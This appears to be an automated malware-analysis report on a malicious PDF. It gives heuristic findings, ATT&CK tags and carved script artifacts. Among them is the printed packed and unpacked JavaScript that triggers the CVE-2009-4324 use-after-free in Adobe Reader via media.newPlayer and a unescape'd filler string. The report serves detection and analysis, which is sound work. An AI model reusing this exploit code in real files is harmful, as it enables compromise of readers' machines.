MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.007 JavaScript
The PDF contains obfuscated JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The presence of a PDF_EVAL firing suggests that the JavaScript is likely being used to execute arbitrary code. The embedded JavaScript file, javascript_obj0006_000.js, is the primary artifact. The script's obfuscation and use of eval() point towards it downloading and executing a second-stage payload.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 5
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2.4("a.9.8 : 3.7.6",5 1);2.4("a.9.8 : 3.7.6",5 1);b{f.h(c)}g(e){}2.4(i("%d%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0"),5 1);',19,19,'u4141|Date|util||printd|new|37|13|1337|000000000|aaa0 … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0006_000.js |
pdf-javascript-stream | PDF /JS object 6 at offset 0x134 | 576 bytes |
SHA-256: d13315070fd7c3bca0dddfc00e394f9294f8198b2642c6218a2828ad767e344a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2.4("a.9.8 : 3.7.6",5 1);2.4("a.9.8 : 3.7.6",5 1);b{f.h(c)}g(e){}2.4(i("%d%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0"),5 1);',19,19,'u4141|Date|util||printd|new|37|13|1337|000000000|aaa000000000|try|null|u413D||media|catch|newPlayer|unescape'.split('|'),0,{}))
|
|||
javascript_obj0006_001.js |
pdf-javascript-stream | PDF /JS object 6 at offset 0x154 | 946 bytes |
SHA-256: 62e9d3a2c40bd31355cc882e4e865cef8f052823a1e94685f2216fd70f18c08a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2.4("a.9.8 : 3.7.6",5 1);2.4("a.9.8 : 3.7.6",5 1);b{f.h(c)}g(e){}2.4(i("%d%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0"),5 1);',19,19,'u4141|Date|util||printd|new|37|13|1337|000000000|aaa000000000|try|null|u413D||media|catch|newPlayer|unescape'.split('|'),0,{}))
endstream
endobj
7 0 obj<</Type/Annot/Subtype/Text/Contents(AAAAAAAAAAAAAA)/Name/Note/Rect[157 429 181 453]>>endobj
xref
0 9
0000000000 65535 f
0000000010 00000 n
0000000086 00000 n
0000000127 00000 n
0000000177 00000 n
0000000255 00000 n
0000000308 00000 n
0000000937 00000 n
0000001037 00000 n
trailer<</Size 181/Root 1 0 R>>
startxref
1037
%%EOF
|
|||
dean_edwards_stage_000.js |
deobfuscated-js | Dean Edwards unpacked JavaScript (raw) at offset 0x157 | 411 bytes |
SHA-256: 51a8fae0469001238a94f66f7a00b4d8c15794471a33d8198e2723742e465fab |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
util.printd("aaa000000000.000000000.1337 : 3.13.37",new Date);util.printd("aaa000000000.000000000.1337 : 3.13.37",new Date);try{media.newPlayer(null)}catch(e){}util.printd(unescape("%u413D%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"),new Date);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.